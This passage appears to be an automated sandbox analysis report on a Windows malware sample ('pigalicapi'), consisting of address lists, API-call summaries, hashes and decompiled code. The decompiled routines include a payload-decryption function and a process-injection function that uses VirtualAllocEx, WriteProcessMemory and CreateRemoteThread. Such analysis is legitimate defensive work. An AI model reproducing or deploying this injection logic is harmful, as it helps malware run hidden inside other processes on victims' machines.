                                                                                                                                                                                                                                                                                                        0x004111ea
                                                                                                                                                                                                                                                                                                        0x004111ef
                                                                                                                                                                                                                                                                                                        0x004111f3
                                                                                                                                                                                                                                                                                                        0x004111f8
                                                                                                                                                                                                                                                                                                        0x004111f8
                                                                                                                                                                                                                                                                                                        0x004111fb
                                                                                                                                                                                                                                                                                                        0x004111fd
                                                                                                                                                                                                                                                                                                        0x00411200
                                                                                                                                                                                                                                                                                                        0x00411205
                                                                                                                                                                                                                                                                                                        0x00411209
                                                                                                                                                                                                                                                                                                        0x00411250
                                                                                                                                                                                                                                                                                                        0x00411258
                                                                                                                                                                                                                                                                                                        0x00411261
                                                                                                                                                                                                                                                                                                        0x00411268
                                                                                                                                                                                                                                                                                                        0x0041126b
                                                                                                                                                                                                                                                                                                        0x0041126d
                                                                                                                                                                                                                                                                                                        0x00411271
                                                                                                                                                                                                                                                                                                        0x00411279
                                                                                                                                                                                                                                                                                                        0x00411280
                                                                                                                                                                                                                                                                                                        0x00411287
                                                                                                                                                                                                                                                                                                        0x00411289
                                                                                                                                                                                                                                                                                                        0x0041128c
                                                                                                                                                                                                                                                                                                        0x00411295
                                                                                                                                                                                                                                                                                                        0x00411295
                                                                                                                                                                                                                                                                                                        0x0041129e
                                                                                                                                                                                                                                                                                                        0x004112a1
                                                                                                                                                                                                                                                                                                        0x004112a3
                                                                                                                                                                                                                                                                                                        0x0041120b
                                                                                                                                                                                                                                                                                                        0x0041120e
                                                                                                                                                                                                                                                                                                        0x00411215
                                                                                                                                                                                                                                                                                                        0x00411219
                                                                                                                                                                                                                                                                                                        0x0041121d
                                                                                                                                                                                                                                                                                                        0x00411228
                                                                                                                                                                                                                                                                                                        0x0041122b
                                                                                                                                                                                                                                                                                                        0x0041122b
                                                                                                                                                                                                                                                                                                        0x0041120e
                                                                                                                                                                                                                                                                                                        0x00411230
                                                                                                                                                                                                                                                                                                        0x00411233
                                                                                                                                                                                                                                                                                                        0x0041123a
                                                                                                                                                                                                                                                                                                        0x0041123f
                                                                                                                                                                                                                                                                                                        0x0041123f
                                                                                                                                                                                                                                                                                                        0x004111ef
                                                                                                                                                                                                                                                                                                        0x00411248

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 383729395-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d1d22da725d0359cd3540e7da02749fe6b1af8f46904c09d6a95be390009998
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08219F716142108FC354EF2AC88569BB7E4EF88750F05886EF948DB311D738EC85CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00A52548,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$AllocCloseCreateFindHandleObjectReleaseSingleWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3969912963-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08ba11220197d5884c5fb90774ff7199050f09fd8405595aaced9661a87e5e57
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E0DFF0204301DFC7309F66E80430677E0BB48304F54893EE8AA973A0D778540ACB8E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                                                        • Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                                                        • Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 1000182F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                                        			E024E8CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                        				long** _t35;
                                                                                                                                                                                                                                                                                                        				char* _t52;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L15:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t31 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        						_t32 = GetLastError();
                                                                                                                                                                                                                                                                                                        						_v16 = _t32;
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t52 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t32 != 0) {
                                                                                                                                                                                                                                                                                                        							_t34 = _a16;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                                                        							if(_t34 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								_t35 =  &_v24;
                                                                                                                                                                                                                                                                                                        								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                                                        								if(_t35 != 0) {
                                                                                                                                                                                                                                                                                                        									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                                        									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x024e8cf6
                                                                                                                                                                                                                                                                                                        0x024e8d01
                                                                                                                                                                                                                                                                                                        0x024e8e1a
                                                                                                                                                                                                                                                                                                        0x024e8e20
                                                                                                                                                                                                                                                                                                        0x024e8d25
                                                                                                                                                                                                                                                                                                        0x024e8d25
                                                                                                                                                                                                                                                                                                        0x024e8d35
                                                                                                                                                                                                                                                                                                        0x024e8d3f
                                                                                                                                                                                                                                                                                                        0x024e8d47
                                                                                                                                                                                                                                                                                                        0x024e8d49
                                                                                                                                                                                                                                                                                                        0x024e8d4f
                                                                                                                                                                                                                                                                                                        0x024e8d59
                                                                                                                                                                                                                                                                                                        0x024e8d6d
                                                                                                                                                                                                                                                                                                        0x024e8d78
                                                                                                                                                                                                                                                                                                        0x024e8d78
                                                                                                                                                                                                                                                                                                        0x024e8d59
                                                                                                                                                                                                                                                                                                        0x024e8d82
                                                                                                                                                                                                                                                                                                        0x024e8d99
                                                                                                                                                                                                                                                                                                        0x024e8da1
                                                                                                                                                                                                                                                                                                        0x024e8da5
                                                                                                                                                                                                                                                                                                        0x024e8db1
                                                                                                                                                                                                                                                                                                        0x024e8db9
                                                                                                                                                                                                                                                                                                        0x024e8dbb
                                                                                                                                                                                                                                                                                                        0x024e8dc2
                                                                                                                                                                                                                                                                                                        0x024e8dd5
                                                                                                                                                                                                                                                                                                        0x024e8ddd
                                                                                                                                                                                                                                                                                                        0x024e8df7
                                                                                                                                                                                                                                                                                                        0x024e8dfe
                                                                                                                                                                                                                                                                                                        0x024e8dfe
                                                                                                                                                                                                                                                                                                        0x024e8ddd
                                                                                                                                                                                                                                                                                                        0x024e8e08
                                                                                                                                                                                                                                                                                                        0x024e8e08
                                                                                                                                                                                                                                                                                                        0x024e8e14
                                                                                                                                                                                                                                                                                                        0x024e8e14
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e8d82

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8D3F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E8D49
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8D78
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8D99
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8DB1
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E8DD5
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8DF1
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E8DFE
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 024E8E08
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8E14
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8D30
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8D68
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: be5592fb3733d1aefc7fd088b7bd7826e3d9de02afa658acf6217aa3026c2298
                                                                                                                                                                                                                                                                                                        • Instruction ID: 61b9d67de264f9f6bec297fd92e1c461c96095195416f335239ffa4b95a423c3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be5592fb3733d1aefc7fd088b7bd7826e3d9de02afa658acf6217aa3026c2298
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82311E75A80209EBFF14DFD4C989FAF7779BB44706F10851AF602AA280C7B49950CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E2510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                                                        					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                                                        					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                                                                                                                        							E024E7B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                                                        							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v36 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								E024E7B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                                                        								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                                                        								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							E024E26D0(_v16, _v32);
                                                                                                                                                                                                                                                                                                        							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								_v28 = 0;
                                                                                                                                                                                                                                                                                                        								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x024e2516
                                                                                                                                                                                                                                                                                                        0x024e2521
                                                                                                                                                                                                                                                                                                        0x024e26c2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2531
                                                                                                                                                                                                                                                                                                        0x024e253a
                                                                                                                                                                                                                                                                                                        0x024e254b
                                                                                                                                                                                                                                                                                                        0x024e2554
                                                                                                                                                                                                                                                                                                        0x024e256a
                                                                                                                                                                                                                                                                                                        0x024e2571
                                                                                                                                                                                                                                                                                                        0x024e2596
                                                                                                                                                                                                                                                                                                        0x024e259d
                                                                                                                                                                                                                                                                                                        0x024e25d7
                                                                                                                                                                                                                                                                                                        0x024e25e6
                                                                                                                                                                                                                                                                                                        0x024e25eb
                                                                                                                                                                                                                                                                                                        0x024e25ee
                                                                                                                                                                                                                                                                                                        0x024e2600
                                                                                                                                                                                                                                                                                                        0x024e263c
                                                                                                                                                                                                                                                                                                        0x024e2641
                                                                                                                                                                                                                                                                                                        0x024e25fd
                                                                                                                                                                                                                                                                                                        0x024e25fd
                                                                                                                                                                                                                                                                                                        0x024e264e
                                                                                                                                                                                                                                                                                                        0x024e2670
                                                                                                                                                                                                                                                                                                        0x024e2692
                                                                                                                                                                                                                                                                                                        0x024e2698
                                                                                                                                                                                                                                                                                                        0x024e26bf
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e26bf
                                                                                                                                                                                                                                                                                                        0x024e267d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2683
                                                                                                                                                                                                                                                                                                        0x024e25b6
                                                                                                                                                                                                                                                                                                        0x024e25bd
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e25ca
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e25d0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2573

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 024E2564
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 024E2590
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 024E25B0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E25CA
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d1426ed85dea1b80a2d87683ddc20e304a9fca7b94a744c756eec17a22ef716e
                                                                                                                                                                                                                                                                                                        • Instruction ID: e98d7bc8285e863676a7fe4831043c6aa477e104ddbefb11413a7fcff4c5d773
